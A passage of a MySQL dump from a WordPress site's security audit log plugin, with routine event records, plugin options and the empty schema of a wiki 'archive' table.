WordPress.com'),(3086,498,'CurrentUserID','0'),(3087,499,'Attempts','1'),(3088,499,'ClientIP','192.0.100.113'),(3089,499,'UserAgent','Jetpack by WordPress.com'),(3090,499,'CurrentUserID','0'),(3091,500,'PostID','420'),(3092,500,'PostType','cookielawinfo'),(3093,500,'PostTitle','Auto Draft'),(3094,500,'ClientIP','81.169.187.232'),(3095,500,'UserAgent','WordPress/4.4; http://www.ollital.de/wordpress'),(3096,500,'CurrentUserID','0'),(3097,501,'PostID','419'),(3098,501,'PostType','post'),(3099,501,'PostTitle','Auto Draft'),(3100,501,'ClientIP','81.169.187.232'),(3101,501,'UserAgent','WordPress/4.4; http://www.ollital.de/wordpress'),(3102,501,'CurrentUserID','0'),(3103,502,'PostID','365'),(3104,502,'PostTitle',''),(3105,502,'MetaID','719'),(3106,502,'MetaKey','maa_disable_display'),(3107,502,'MetaValue','0'),(3108,502,'ClientIP','81.169.187.232'),(3109,502,'UserAgent','WordPress/4.4; http://www.ollital.de/wordpress'),(3110,502,'CurrentUserID','0'),(3111,503,'PostID','365'),(3112,503,'PostTitle',''),(3113,503,'MetaID','720'),(3114,503,'MetaKey','maa_disable_auto_insert'),(3115,503,'MetaValue','0'),(3116,503,'ClientIP','81.169.187.232'),(3117,503,'UserAgent','WordPress/4.4; http://www.ollital.de/wordpress'),(3118,503,'CurrentUserID','0'),(3119,504,'PostID','365'),(3120,504,'PostType','post'),(3121,504,'PostTitle',''),(3122,504,'ClientIP','81.169.187.232'),(3123,504,'UserAgent','WordPress/4.4; http://www.ollital.de/wordpress'),(3124,504,'CurrentUserID','0'); /*!40000 ALTER TABLE `wp_wsal_metadata` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wsal_occurrences` -- DROP TABLE IF EXISTS `wp_wsal_occurrences`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_wsal_occurrences` ( `id` bigint(20) NOT NULL AUTO_INCREMENT, `site_id` bigint(20) NOT NULL, `alert_id` bigint(20) NOT NULL, `created_on` double NOT NULL, `is_read` bit(1) NOT NULL, `is_migrated` bit(1) NOT NULL, PRIMARY KEY (`id`), KEY `site_alert_created` (`site_id`,`alert_id`,`created_on`) ) ENGINE=InnoDB AUTO_INCREMENT=505 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_wsal_occurrences` -- LOCK TABLES `wp_wsal_occurrences` WRITE; /*!40000 ALTER TABLE `wp_wsal_occurrences` DISABLE KEYS */; INSERT INTO `wp_wsal_occurrences` VALUES (1,1,1002,1447878900.23413,'\0','\0'),(2,1,1000,1447878921.561036,'\0','\0'),(3,1,1002,1447882392.576583,'\0','\0'),(4,1,1002,1447890464.674747,'\0','\0'),(5,1,1002,1447890465.495774,'\0','\0'),(6,1,1002,1447890999.533536,'\0','\0'),(7,1,1002,1447891106.63382,'\0','\0'),(8,1,1002,1447905081.263319,'',''),(9,1,1002,1447892139.487458,'\0','\0'),(10,1,1002,1447893085.518651,'\0','\0'),(11,1,1002,1447900276.191516,'\0','\0'),(12,1,1002,1447902680.476682,'\0','\0'),(13,1,1002,1447902955.560772,'\0','\0'),(14,1,1002,1447905093.029255,'\0','\0'),(15,1,1002,1447905531.397644,'\0','\0'),(16,1,1002,1447905670.001923,'\0','\0'),(17,1,1002,1447905851.833003,'\0','\0'),(18,1,1002,1447906728.859701,'\0','\0'),(19,1,1002,1447908452.786171,'\0','\0'),(20,1,1002,1447911389.638174,'\0','\0'),(21,1,1000,1447913270.044975,'\0','\0'),(22,1,4002,1447913409.746434,'\0','\0'),(23,1,4004,1447913440.561242,'\0','\0'),(24,1,1000,1447913495.65872,'\0','\0'),(25,1,1000,1447913528.918164,'\0','\0'),(26,1,4007,1447913614.096589,'\0','\0'),(27,1,4007,1447913622.601565,'\0','\0'),(28,1,1000,1447915391.145368,'\0','\0'),(29,1,1003,1447921392.389316,'\0','\0'),(30,1,1003,1447921429.026196,'\0','\0'),(31,1,1003,1447921439.285184,'\0','\0'),(32,1,1000,1447921897.395583,'\0','\0'),(33,1,5000,1447921927.684171,'\0','\0'),(34,1,1003,1447921936.614659,'\0','\0'),(35,1,5001,1447921940.175688,'\0','\0'),(36,1,1003,1447921945.004824,'\0','\0'),(37,1,5003,1447921957.185693,'\0','\0'),(38,1,1000,1447922037.66706,'\0','\0'),(39,1,1003,1447922105.98767,'\0','\0'),(40,1,1003,1447922303.871807,'\0','\0'),(41,1,1003,1447956966.889611,'',''),(42,1,1003,1447924260.675672,'\0','\0'),(43,1,1003,1447927009.510084,'\0','\0'),(44,1,1003,1447927836.02618,'\0','\0'),(45,1,1000,1447930969.923978,'\0','\0'),(46,1,1003,1447938475.270151,'\0','\0'),(47,1,1003,1447938484.443332,'\0','\0'),(48,1,1003,1447938549.821602,'\0','\0'),(49,1,1003,1447938646.378086,'\0','\0'),(50,1,1003,1447938993.878665,'\0','\0'),(51,1,1003,1447942531.403721,'',''),(52,1,1003,1447942530.389285,'\0','\0'),(53,1,1000,1447942719.518075,'\0','\0'),(54,1,1003,1447942759.3304,'\0','\0'),(55,1,1003,1447952016.853504,'\0','\0'),(56,1,1003,1447956011.55783,'\0','\0'),(57,1,1003,1447958301.650326,'\0','\0'),(58,1,1003,1447958305.285267,'\0','\0'),(59,1,1003,1447960273.848244,'\0','\0'),(60,1,1003,1447960340.438736,'\0','\0'),(61,1,1003,1447961853.190182,'\0','\0'),(62,1,1003,1447962619.695542,'\0','\0'),(63,1,1003,1447963575.30509,'\0','\0'),(64,1,1000,1447967377.876738,'\0','\0'),(65,1,1003,1447978296.061639,'\0','\0'),(66,1,1003,1447978301.298833,'\0','\0'),(67,1,1003,1447979412.602807,'\0','\0'),(68,1,1003,1447979414.220026,'\0','\0'),(69,1,1003,1447981421.548088,'\0','\0'),(70,1,1003,1447999032.698506,'',''),(71,1,1003,1447982071.979541,'\0','\0'),(72,1,1003,1447983215.571408,'\0','\0'),(73,1,1003,1447996509.531362,'\0','\0'),(74,1,1003,1447998759.172789,'\0','\0'),(75,1,1003,1448024219.250074,'',''),(76,1,1003,1447999553.653964,'\0','\0'),(77,1,1003,1447999601.404798,'\0','\0'),(78,1,1003,1448001411.127411,'\0','\0'),(79,1,1003,1448001495.856844,'\0','\0'),(80,1,1003,1448003952.206078,'\0','\0'),(81,1,1003,1448017548.278881,'\0','\0'),(82,1,1003,1448022548.615743,'\0','\0'),(83,1,1003,1448024250.878671,'\0','\0'),(84,1,1003,1448025375.939949,'\0','\0'),(85,1,1003,1448025439.170733,'\0','\0'),(86,1,1003,1448026277.445359,'\0','\0'),(87,1,1003,1448028159.089659,'\0','\0'),(88,1,1003,1448045885.321779,'\0','\0'),(89,1,1003,1448046082.402597,'\0','\0'),(90,1,1003,1448046109.392281,'\0','\0'),(91,1,1003,1448046925.009272,'\0','\0'),(92,1,1003,1448048043.677321,'\0','\0'),(93,1,1003,1448051652.251116,'\0','\0'),(94,1,1003,1448052017.801779,'\0','\0'),(95,1,1003,1448052986.390009,'\0','\0'),(96,1,1003,1448053963.531507,'\0','\0'),(97,1,1003,1448055210.771604,'\0','\0'),(98,1,1003,1448056355.897927,'\0','\0'),(99,1,1003,1448079409.061996,'\0','\0'),(100,1,1003,1448148228.277677,'',''),(101,1,1003,1448079751.498621,'\0','\0'),(102,1,1003,1448117406.71098,'',''),(103,1,1003,1448080678.810261,'\0','\0'),(104,1,1003,1448113662.130137,'',''),(105,1,1003,1448087946.688803,'\0','\0'),(106,1,1003,1448100003.108244,'\0','\0'),(107,1,1003,1448109605.655317,'\0','\0'),(108,1,1003,1448112196.74292,'\0','\0'),(109,1,1003,1448113496.002461,'\0','\0'),(110,1,1003,1448114466.108092,'\0','\0'),(111,1,1003,1448114692.188784,'\0','\0'),(112,1,1003,1448117444.464241,'\0','\0'),(113,1,1003,1448121007.758415,'\0','\0'),(114,1,1000,1448123329.256685,'\0','\0'),(115,1,1003,1448123356.79376,'\0','\0'),(116,1,1003,1448129089.699783,'\0','\0'),(117,1,1000,1448142219.647479,'\0','\0'),(118,1,1003,1448148232.694572,'\0','\0'),(119,1,1003,1448149395.481506,'\0','\0'),(120,1,1003,1448152147.18697,'\0','\0'),(121,1,1003,1448154433.498778,'\0','\0'),(122,1,1003,1448154435.049957,'\0','\0'),(123,1,1003,1448155297.042833,'\0','\0'),(124,1,1003,1448156229.280502,'\0','\0'),(125,1,1003,1448156289.802448,'\0','\0'),(126,1,1003,1448172266.783221,'\0','\0'),(127,1,1003,1448186001.231666,'',''),(128,1,1000,1448186684.221742,'\0','\0'),(129,1,5002,1448186697.963404,'\0','\0'),(130,1,5002,1448186698.329566,'\0','\0'),(131,1,5002,1448186698.689053,'\0','\0'),(132,1,5002,1448186699.056332,'\0','\0'),(133,1,5002,1448186699.423551,'\0','\0'),(134,1,5002,1448186699.791165,'\0','\0'),(135,1,5002,1448186985.868662,'\0','\0'),(136,1,5002,1448186989.55226,'\0','\0'),(137,1,1000,1448187037.213968,'\0','\0'),(138,1,5002,1448187077.291864,'\0','\0'),(139,1,5003,1448187117.856456,'\0','\0'),(140,1,5004,1448187196.991736,'\0','\0'),(141,1,5004,1448187488.209114,'\0','\0'),(142,1,5004,1448187509.553273,'\0','\0'),(143,1,5004,1448187560.262346,'\0','\0'),(144,1,5004,1448187588.687799,'\0','\0'),(145,1,5004,1448187921.455344,'\0','\0'),(146,1,5004,1448187954.765279,'\0','\0'),(147,1,5004,1448187981.798298,'\0','\0'),(148,1,5004,1448188185.519584,'\0','\0'),(149,1,5004,1448188665.908468,'\0','\0'),(150,1,1003,1448189083.423315,'\0','\0'),(151,1,1003,1448191167.076303,'\0','\0'),(152,1,1003,1448193827.899763,'\0','\0'),(153,1,1003,1448196594.987479,'\0','\0'),(154,1,1003,1448197354.207438,'\0','\0'),(155,1,1003,1448198966.926817,'\0','\0'),(156,1,5004,1448199499.358213,'\0','\0'),(157,1,1003,1448199603.618182,'\0','\0'),(158,1,5004,1448199620.495104,'\0','\0'),(159,1,5004,1448199630.102249,'\0','\0'),(160,1,1000,1448199962.320182,'\0','\0'),(161,1,1000,1448205949.749228,'\0','\0'),(162,1,5000,1448207388.723422,'\0','\0'),(163,1,5001,1448207389.299226,'\0','\0'),(164,1,1003,1448210783.441614,'\0','\0'),(165,1,1000,1448223342.788089,'\0','\0'),(166,1,1000,1448225121.248586,'\0','\0'),(167,1,1000,1448259244.38019,'\0','\0'),(168,1,2042,1448261992.440143,'\0','\0'),(169,1,2071,1448261993.437511,'\0','\0'),(170,1,2071,1448261993.967107,'\0','\0'),(171,1,2071,1448261994.434679,'\0','\0'),(172,1,2071,1448261994.901814,'\0','\0'),(173,1,2071,1448261995.385928,'\0','\0'),(174,1,2071,1448261995.850396,'\0','\0'),(175,1,2071,1448261996.317802,'\0','\0'),(176,1,2071,1448261996.785273,'\0','\0'),(177,1,2043,1448262017.277286,'\0','\0'),(178,1,2043,1448262193.05184,'\0','\0'),(179,1,2033,1448265517.86921,'\0','\0'),(180,1,2033,1448265518.856182,'\0','\0'),(181,1,2033,1448265519.754283,'\0','\0'),(182,1,1000,1448276142.552666,'\0','\0'),(183,1,5000,1448276204.030793,'\0','\0'),(184,1,5001,1448276212.855243,'\0','\0'),(185,1,2067,1448276501.019109,'\0','\0'),(186,1,2000,1448276521.04881,'\0','\0'),(187,1,2027,1448276521.721386,'\0','\0'),(188,1,1000,1448277138.707446,'\0','\0'),(189,1,2067,1448277608.019663,'\0','\0'),(190,1,1000,1448277671.143918,'\0','\0'),(191,1,1000,1448277708.806966,'\0','\0'),(192,1,2065,1448277731.817955,'\0','\0'),(193,1,2031,1448277790.181164,'\0','\0'),(194,1,2012,1448280202.974694,'\0','\0'),(195,1,2003,1448280203.754026,'\0','\0'),(196,1,2053,1448280204.289272,'\0','\0'),(197,1,2053,1448280204.847997,'\0','\0'),(198,1,5001,1448280255.931384,'\0','\0'),(199,1,1000,1448286764.355134,'\0','\0'),(200,1,1000,1448286853.769692,'\0','\0'),(201,1,2031,1448286868.449557,'\0','\0'),(202,1,2043,1448290680.019374,'\0','\0'),(203,1,1000,1448298319.135007,'\0','\0'),(204,1,1000,1448312249.427392,'\0','\0'),(205,1,1000,1448312492.674507,'\0','\0'),(206,1,5002,1448347348.458164,'\0','\0'),(207,1,5000,1448362799.546038,'\0','\0'),(208,1,5001,1448362806.399657,'\0','\0'),(209,1,5001,1448362812.738477,'\0','\0'),(210,1,4001,1448363078.316046,'\0','\0'),(211,1,1000,1448363160.453562,'\0','\0'),(212,1,5000,1448363506.144093,'\0','\0'),(213,1,5001,1448363548.920269,'\0','\0'),(214,1,5002,1448363557.00252,'\0','\0'),(215,1,5002,1448363602.157518,'\0','\0'),(216,1,5003,1448368009.985178,'\0','\0'),(217,1,5003,1448368012.927779,'\0','\0'),(218,1,5003,1448368020.430587,'\0','\0'),(219,1,5003,1448368023.104304,'\0','\0'),(220,1,1000,1448377311.663184,'\0','\0'),(221,1,2008,1448401945.59986,'\0','\0'),(222,1,1000,1448432765.987928,'\0','\0'),(223,1,2027,1448432790.037166,'\0','\0'),(224,1,2003,1448432910.002245,'\0','\0'),(225,1,2068,1448432985.014412,'\0','\0'),(226,1,2068,1448433060.026248,'\0','\0'),(227,1,2068,1448433135.021488,'\0','\0'),(228,1,2068,1448433210.049982,'\0','\0'),(229,1,2068,1448433285.029159,'\0','\0'),(230,1,2068,1448433360.02252,'\0','\0'),(231,1,2000,1448433396.125196,'\0','\0'),(232,1,2068,1448433396.843447,'\0','\0'),(233,1,2068,1448433460.301255,'\0','\0'),(234,1,2068,1448433535.302185,'\0','\0'),(235,1,1000,1448433553.058877,'\0','\0'),(236,1,1002,1448436215.320062,'\0','\0'),(237,1,1000,1448436233.641115,'\0','\0'),(238,1,1000,1448437985.987256,'\0','\0'),(239,1,2068,1448438049.330464,'\0','\0'),(240,1,2068,1448438124.253447,'\0','\0'),(241,1,2068,1448438308.145659,'\0','\0'),(242,1,2068,1448438372.640724,'\0','\0'),(243,1,2068,1448447168.663971,'\0','\0'),(244,1,2068,1448447188.201477,'\0','\0'),(245,1,2068,1448447251.789944,'\0','\0'),(246,1,2068,1448453880.577004,'\0','\0'),(247,1,2068,1448453955.396867,'\0','\0'),(248,1,2068,1448454030.244525,'\0','\0'),(249,1,2068,1448454085.548319,'\0','\0'),(250,1,1000,1448454125.251984,'\0','\0'),(251,1,2068,1448454141.485164,'\0','\0'),(252,1,2068,1448454172.631247,'\0','\0'),(253,1,1000,1448454191.912092,'\0','\0'),(254,1,2068,1448454208.154264,'\0','\0'),(255,1,2001,1448454210.722177,'\0','\0'),(256,1,2068,1448454211.353581,'\0','\0'),(257,1,1000,1448455097.581056,'\0','\0'),(258,1,1000,1448456782.518184,'\0','\0'),(259,1,1000,1448456814.024227,'\0','\0'),(260,1,1000,1448456829.454475,'\0','\0'),(261,1,2065,1448456845.875515,'\0','\0'),(262,1,2065,1448456854.989076,'\0','\0'),(263,1,5004,1448456900.248651,'\0','\0'),(264,1,1000,1448473756.312033,'\0','\0'),(265,1,5002,1448520464.396957,'\0','\0'),(266,1,5000,1448540961.423709,'\0','\0'),(267,1,5001,1448540972.467115,'\0','\0'),(268,1,1000,1448541007.006261,'\0','\0'),(269,1,1000,1448542992.546089,'\0','\0'),(270,1,2028,1448543004.197297,'\0','\0'),(271,1,2069,1448543079.218708,'\0','\0'),(272,1,2067,1448543270.5785,'\0','\0'),(273,1,2028,1448543322.75822,'\0','\0'),(274,1,2069,1448543397.702747,'\0','\0'),(275,1,2004,1448543400.364441,'\0','\0'),(276,1,2069,1448543401.042964,'\0','\0'),(277,1,1000,1448543421.85107,'\0','\0'),(278,1,2005,1448543427.135615,'\0','\0'),(279,1,2007,1448543427.614963,'\0','\0'),(280,1,1000,1448543446.202512,'\0','\0'),(281,1,2031,1448543566.99665,'\0','\0'),(282,1,2031,1448543567.578451,'\0','\0'),(283,1,2031,1448543568.154358,'\0','\0'),(284,1,2032,1448543568.944931,'\0','\0'),(285,1,2031,1448543622.733719,'\0','\0'),(286,1,2031,1448543623.307935,'\0','\0'),(287,1,2031,1448543623.886955,'\0','\0'),(288,1,2031,1448543624.462622,'\0','\0'),(289,1,1000,1448543657.51926,'\0','\0'),(290,1,1000,1448546925.192931,'\0','\0'),(291,1,1000,1448546987.772388,'\0','\0'),(292,1,2031,1448547041.139496,'\0','\0'),(293,1,1000,1448547087.830972,'\0','\0'),(294,1,2031,1448547171.353688,'\0','\0'),(295,1,2031,1448547171.963362,'\0','\0'),(296,1,2031,1448547172.537645,'\0','\0'),(297,1,2031,1448547173.113452,'\0','\0'),(298,1,2031,1448547182.293947,'\0','\0'),(299,1,2031,1448547182.918538,'\0','\0'),(300,1,2031,1448547183.511125,'\0','\0'),(301,1,2031,1448547184.102221,'\0','\0'),(302,1,1000,1448547196.678355,'\0','\0'),(303,1,1000,1448547215.400864,'\0','\0'),(304,1,1000,1448550270.493977,'\0','\0'),(305,1,2027,1448550311.129415,'\0','\0'),(306,1,2068,1448550376.600499,'\0','\0'),(307,1,2068,1448550451.428368,'\0','\0'),(308,1,2068,1448550691.612279,'\0','\0'),(309,1,2068,1448550766.437537,'\0','\0'),(310,1,2068,1448550841.438424,'\0','\0'),(311,1,2068,1448551087.363438,'\0','\0'),(312,1,2068,1448551161.350438,'\0','\0'),(313,1,1000,1448551269.539136,'\0','\0'),(314,1,2068,1448552491.642952,'\0','\0'),(315,1,2068,1448552699.094873,'\0','\0'),(316,1,2068,1448552714.927569,'\0','\0'),(317,1,1000,1448561715.04825,'\0','\0'),(318,1,2068,1448562075.191017,'\0','\0'),(319,1,2068,1448562138.579871,'\0','\0'),(320,1,2068,1448562213.614297,'\0','\0'),(321,1,2068,1448562288.620107,'\0','\0'),(322,1,2068,1448562363.648474,'\0','\0'),(323,1,2068,1448562438.661046,'\0','\0'),(324,1,2068,1448562513.623248,'\0','\0'),(325,1,2068,1448562588.612119,'\0','\0'),(326,1,2016,1448562603.629216,'\0','\0'),(327,1,2068,1448562604.331747,'\0','\0'),(328,1,1000,1448562623.765189,'\0','\0'),(329,1,2068,1448562655.148522,'\0','\0'),(330,1,2001,1448562683.401223,'\0','\0'),(331,1,2068,1448562684.159649,'\0','\0'),(332,1,1000,1448562938.183735,'\0','\0'),(333,1,2002,1448563209.889854,'\0','\0'),(334,1,2065,1448563243.055056,'\0','\0'),(335,1,2065,1448563321.223154,'\0','\0'),(336,1,1000,1448572918.584206,'\0','\0'),(337,1,1000,1448573203.268015,'\0','\0'),(338,1,2067,1448573560.651563,'\0','\0'),(339,1,2065,1448573691.410962,'\0','\0'),(340,1,2008,1448574694.954779,'\0','\0'),(341,1,2008,1448574695.38024,'\0','\0'),(342,1,2031,1448604215.051087,'\0','\0'),(343,1,2031,1448604215.629311,'\0','\0'),(344,1,2031,1448604216.204924,'\0','\0'),(345,1,2031,1448604216.780747,'\0','\0'),(346,1,2067,1448604286.136206,'\0','\0'),(347,1,1000,1448622765.514604,'\0','\0'),(348,1,2067,1448622811.520237,'\0','\0'),(349,1,1000,1448625951.715662,'\0','\0'),(350,1,1003,1448661049.44467,'\0','\0'),(351,1,5004,1448661599.171347,'\0','\0'),(352,1,1000,1448661780.346319,'\0','\0'),(353,1,1000,1448661788.995504,'\0','\0'),(354,1,1000,1448661849.841658,'\0','\0'),(355,1,1000,1448661861.677016,'\0','\0'),(356,1,4003,1448661943.211098,'\0','\0'),(357,1,1000,1448661963.367756,'\0','\0'),(358,1,1002,1448662143.772199,'',''),(359,1,1000,1448661990.10011,'\0','\0'),(360,1,1000,1448662076.599765,'\0','\0'),(361,1,1000,1448662084.58021,'\0','\0'),(362,1,1000,1448662153.669192,'\0','\0'),(363,1,1003,1448662180.726473,'\0','\0'),(364,1,1000,1448662188.764003,'\0','\0'),(365,1,1000,1448709484.991218,'\0','\0'),(366,1,1000,1448736373.914198,'\0','\0'),(367,1,2010,1448736480.582539,'\0','\0'),(368,1,1000,1448747855.723565,'\0','\0'),(369,1,2027,1448747891.172592,'\0','\0'),(370,1,2068,1448747966.463992,'\0','\0'),(371,1,2068,1448748041.242554,'\0','\0'),(372,1,2000,1448748065.133139,'\0','\0'),(373,1,2068,1448748065.82002,'\0','\0'),(374,1,2067,1448748190.534932,'\0','\0'),(375,1,2068,1448748272.607048,'\0','\0'),(376,1,2068,1448748347.645059,'\0','\0'),(377,1,2001,1448748369.649181,'\0','\0'),(378,1,2068,1448748370.398707,'\0','\0'),(379,1,1000,1448748387.13379,'\0','\0'),(380,1,2031,1448748395.10131,'\0','\0'),(381,1,1000,1448829088.31725,'\0','\0'),(382,1,1000,1448905966.678607,'\0','\0'),(383,1,2008,1448920339.607929,'\0','\0'),(384,1,1002,1449039881.264259,'',''),(385,1,4003,1449039726.021341,'\0','\0'),(386,1,4003,1449039813.881816,'\0','\0'),(387,1,4003,1449039961.140816,'\0','\0'),(388,1,1000,1449039979.076606,'\0','\0'),(389,1,5004,1449040011.153152,'\0','\0'),(390,1,5004,1449040028.778925,'\0','\0'),(391,1,5004,1449040050.543229,'\0','\0'),(392,1,5004,1449040077.007358,'\0','\0'),(393,1,5004,1449040093.051339,'\0','\0'),(394,1,5004,1449040106.762029,'\0','\0'),(395,1,5004,1449040122.713714,'\0','\0'),(396,1,5004,1449040158.969279,'\0','\0'),(397,1,2027,1449134066.336971,'\0','\0'),(398,1,2068,1449134140.944461,'\0','\0'),(399,1,2068,1449134215.933367,'\0','\0'),(400,1,2068,1449134291.240768,'\0','\0'),(401,1,2001,1449134307.1812,'\0','\0'),(402,1,2068,1449134308.031447,'\0','\0'),(403,1,1000,1449144011.003058,'\0','\0'),(404,1,1002,1449156188.325637,'',''),(405,1,4003,1449156247.864888,'\0','\0'),(406,1,1000,1449156273.012113,'\0','\0'),(407,1,2027,1449156334.768284,'\0','\0'),(408,1,2068,1449156409.485732,'\0','\0'),(409,1,2068,1449156484.591841,'\0','\0'),(410,1,2068,1449156559.627321,'\0','\0'),(411,1,2000,1449156623.597168,'\0','\0'),(412,1,2068,1449156624.293398,'\0','\0'),(413,1,2068,1449157279.200831,'\0','\0'),(414,1,2068,1449157304.356293,'\0','\0'),(415,1,2068,1449157768.291165,'\0','\0'),(416,1,2068,1449157789.937266,'\0','\0'),(417,1,2068,1449158544.588939,'\0','\0'),(418,1,2068,1449158592.831241,'\0','\0'),(419,1,2068,1449159659.616233,'\0','\0'),(420,1,2001,1449167429.477507,'\0','\0'),(421,1,2068,1449167430.321256,'\0','\0'),(422,1,1000,1449176524.083503,'\0','\0'),(423,1,1002,1449234170.850569,'\0','\0'),(424,1,1000,1449234182.774499,'\0','\0'),(425,1,2008,1449268532.395414,'\0','\0'),(426,1,1000,1449494211.329131,'\0','\0'),(427,1,5004,1449494265.702303,'\0','\0'),(428,1,5004,1449494299.53335,'\0','\0'),(429,1,5004,1449494312.962228,'\0','\0'),(430,1,1000,1449672190.41624,'\0','\0'),(431,1,2027,1449672251.863854,'\0','\0'),(432,1,2068,1449672327.861135,'\0','\0'),(433,1,2068,1449672451.912224,'\0','\0'),(434,1,2068,1449672550.101775,'\0','\0'),(435,1,2068,1449672625.089462,'\0','\0'),(436,1,2068,1449673748.758095,'\0','\0'),(437,1,2068,1449673854.935058,'\0','\0'),(438,1,2068,1449673949.337545,'\0','\0'),(439,1,2068,1449674207.410688,'\0','\0'),(440,1,2068,1449674283.855672,'\0','\0'),(441,1,2068,1449674402.617799,'\0','\0'),(442,1,2068,1449674441.856661,'\0','\0'),(443,1,1002,1449693216.042249,'',''),(444,1,1000,1449693232.481403,'\0','\0'),(445,1,2068,1449693313.260028,'\0','\0'),(446,1,2068,1449693388.160406,'\0','\0'),(447,1,2068,1449693463.184659,'\0','\0'),(448,1,2068,1449693581.555991,'\0','\0'),(449,1,2068,1449693656.56897,'\0','\0'),(450,1,2023,1449693668.670394,'\0','\0'),(451,1,2068,1449693731.743221,'\0','\0'),(452,1,2068,1449693806.633547,'\0','\0'),(453,1,2068,1449693881.628068,'\0','\0'),(454,1,2068,1449693945.393577,'\0','\0'),(455,1,2068,1449694020.45777,'\0','\0'),(456,1,2068,1449694095.446617,'\0','\0'),(457,1,2068,1449694170.43928,'\0','\0'),(458,1,2068,1449694245.503791,'\0','\0'),(459,1,2068,1449694320.458686,'\0','\0'),(460,1,2068,1449694394.396383,'\0','\0'),(461,1,2068,1449694421.9076,'\0','\0'),(462,1,2001,1449694425.699557,'\0','\0'),(463,1,2068,1449694426.374792,'\0','\0'),(464,1,6004,1449694451.286131,'\0','\0'),(465,1,6004,1449694457.089887,'\0','\0'),(466,1,1000,1449694662.652905,'\0','\0'),(467,1,6004,1449694748.026325,'\0','\0'),(468,1,1000,1449694838.95131,'\0','\0'),(469,1,1000,1449695089.724221,'\0','\0'),(470,1,1000,1449730268.949448,'\0','\0'),(471,1,1000,1449771647.564694,'\0','\0'),(472,1,2065,1449771664.652443,'\0','\0'),(473,1,1002,1449772036.168632,'\0','\0'),(474,1,1000,1449772051.89494,'\0','\0'),(475,1,1000,1449957781.574123,'\0','\0'),(476,1,1000,1450021541.46134,'\0','\0'),(477,1,5004,1450021571.705687,'\0','\0'),(478,1,2008,1450043211.120539,'\0','\0'),(479,1,2008,1450043212.751536,'\0','\0'),(480,1,2008,1450043213.538788,'\0','\0'),(481,1,2027,1450121814.531665,'\0','\0'),(482,1,2068,1450121890.171866,'\0','\0'),(483,1,2068,1450121952.815768,'\0','\0'),(484,1,2068,1450122016.375955,'\0','\0'),(485,1,2068,1450122102.370174,'\0','\0'),(486,1,2068,1450122177.399138,'\0','\0'),(487,1,2068,1450122252.869578,'\0','\0'),(488,1,2068,1450122318.663231,'\0','\0'),(489,1,2068,1450122390.025431,'\0','\0'),(490,1,2068,1450122465.861546,'\0','\0'),(491,1,2068,1450122544.164504,'\0','\0'),(492,1,2001,1450122547.909561,'\0','\0'),(493,1,2068,1450122548.742253,'\0','\0'),(494,1,2008,1450130214.337375,'\0','\0'),(495,1,1000,1450165342.785947,'\0','\0'),(496,1,1000,1450216437.266414,'\0','\0'),(497,1,1000,1450216612.789217,'\0','\0'),(498,1,1003,1450646159.020076,'\0','\0'),(499,1,1003,1450779157.221345,'\0','\0'),(500,1,2033,1450821787.319521,'\0','\0'),(501,1,2008,1450821787.781555,'\0','\0'),(502,1,2055,1450909327.438827,'\0','\0'),(503,1,2055,1450909327.953897,'\0','\0'),(504,1,2008,1450909329.058725,'\0','\0'); /*!40000 ALTER TABLE `wp_wsal_occurrences` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wsal_options` -- DROP TABLE IF EXISTS `wp_wsal_options`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_wsal_options` ( `id` bigint(20) NOT NULL AUTO_INCREMENT, `option_name` varchar(100) NOT NULL, `option_value` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_wsal_options` -- LOCK TABLES `wp_wsal_options` WRITE; /*!40000 ALTER TABLE `wp_wsal_options` DISABLE KEYS */; INSERT INTO `wp_wsal_options` VALUES (1,'wsal-pruning-date','1 month'),(2,'wsal-pruning-limit-e',''),(3,'wsal-pruning-limit','5000'),(4,'wsal-items-per-page','50'); /*!40000 ALTER TABLE `wp_wsal_options` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping events for database 'wordpress' -- -- -- Current Database: `wp_ollitalde` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `wp_ollitalde` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `wp_ollitalde`; -- -- Dumping events for database 'wp_ollitalde' -- -- -- Current Database: `wupperwiki` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `wupperwiki` /*!40100 DEFAULT CHARACTER SET utf8 */; USE `wupperwiki`; -- -- Table structure for table `archive` -- DROP TABLE IF EXISTS `archive`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `archive` ( `ar_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `ar_namespace` int(11) NOT NULL DEFAULT '0', `ar_title` varbinary(255) NOT NULL DEFAULT '', `ar_text` mediumblob NOT NULL, `ar_comment` tinyblob NOT NULL, `ar_user` int(10) unsigned NOT NULL DEFAULT '0', `ar_user_text` varbinary(255) NOT NULL, `ar_timestamp` binary(14) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `ar_minor_edit` tinyint(4) NOT NULL DEFAULT '0', `ar_flags` tinyblob NOT NULL, `ar_rev_id` int(10) unsigned DEFAULT NULL, `ar_text_id` int(10) unsigned DEFAULT NULL, `ar_deleted` tinyint(3) unsigned NOT NULL DEFAULT '0', `ar_len` int(10) unsigned DEFAULT NULL, `ar_page_id` int(10) unsigned DEFAULT NULL, `ar_parent_id` int(10) unsigned DEFAULT NULL, `ar_sha1` varbinary(32) NOT NULL DEFAULT '', `ar_content_model` varbinary(32) DEFAULT NULL, `ar_content_format` varbinary(64) DEFAULT NULL, PRIMARY KEY (`ar_id`), KEY `name_title_timestamp` (`ar_namespace`,`ar_title`,`ar_timestamp`), KEY `usertext_timestamp` (`ar_user_text`,`ar_timestamp`), KEY `ar_revid` (`ar_rev_id`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `archive` -- LOCK TABLES `archive` WRITE; /*!40000 ALTER TABLE `archive` DISABLE KEYS */; /*!40000 ALTER TABLE `archive` ENABLE KEYS */; 